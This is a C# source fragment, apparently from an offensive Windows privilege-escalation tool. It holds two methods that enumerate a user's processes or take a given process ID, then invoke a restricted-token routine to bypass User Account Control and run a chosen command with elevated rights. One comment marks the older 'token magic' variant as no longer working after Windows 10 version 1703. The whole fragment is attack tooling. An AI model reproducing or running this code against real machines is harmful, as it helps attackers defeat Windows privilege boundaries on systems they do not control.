////////////////////////////////////////////////////////////////////////////////
//
////////////////////////////////////////////////////////////////////////////////
public static void BypassUAC(String input)
{
Int32 processID;
String command;
if (GetProcessID(input, out processID, out command))
{
using (RestrictedToken rt = new RestrictedToken())
{
rt.BypassUAC(processID, command);
}
}
else
{
String name = WindowsIdentity.GetCurrent().Name;
Dictionary <UInt32, String> uacUsers = Enumeration.EnumerateUserProcesses(true, name);
foreach (UInt32 pid in uacUsers.Keys)
{
Console.WriteLine("\n[*] Attempting Bypass with PID {0} ({1})", pid, uacUsers[pid]);
using (RestrictedToken rt = new RestrictedToken())
{
rt.BypassUAC((Int32)pid, input);
}
}
}
}
////////////////////////////////////////////////////////////////////////////////
// UAC Token Magic - Deprecated
////////////////////////////////////////////////////////////////////////////////
private static void _BypassUAC(CommandLineParsing cLP, IntPtr hToken)
{
Console.WriteLine("[*] Notice: This no longer working on versions of Windows 10 > 1703");
if (cLP.Remote)
{
using (RestrictedToken rt = new RestrictedToken(hToken))
{
rt.BypassUAC(cLP.ProcessID, cLP.Command);
}
}
else
{
string name = WindowsIdentity.GetCurrent().Name;
Dictionary <uint, string> uacUsers = UserSessions.EnumerateUserProcesses(true, name);
foreach (uint pid in uacUsers.Keys)
{
Console.WriteLine("\n[*] Attempting Bypass with PID {0} ({1})", pid, uacUsers[pid]);
using (RestrictedToken rt = new RestrictedToken(hToken))
{
rt.BypassUAC((int)pid, cLP.Command);
}
}
}
}
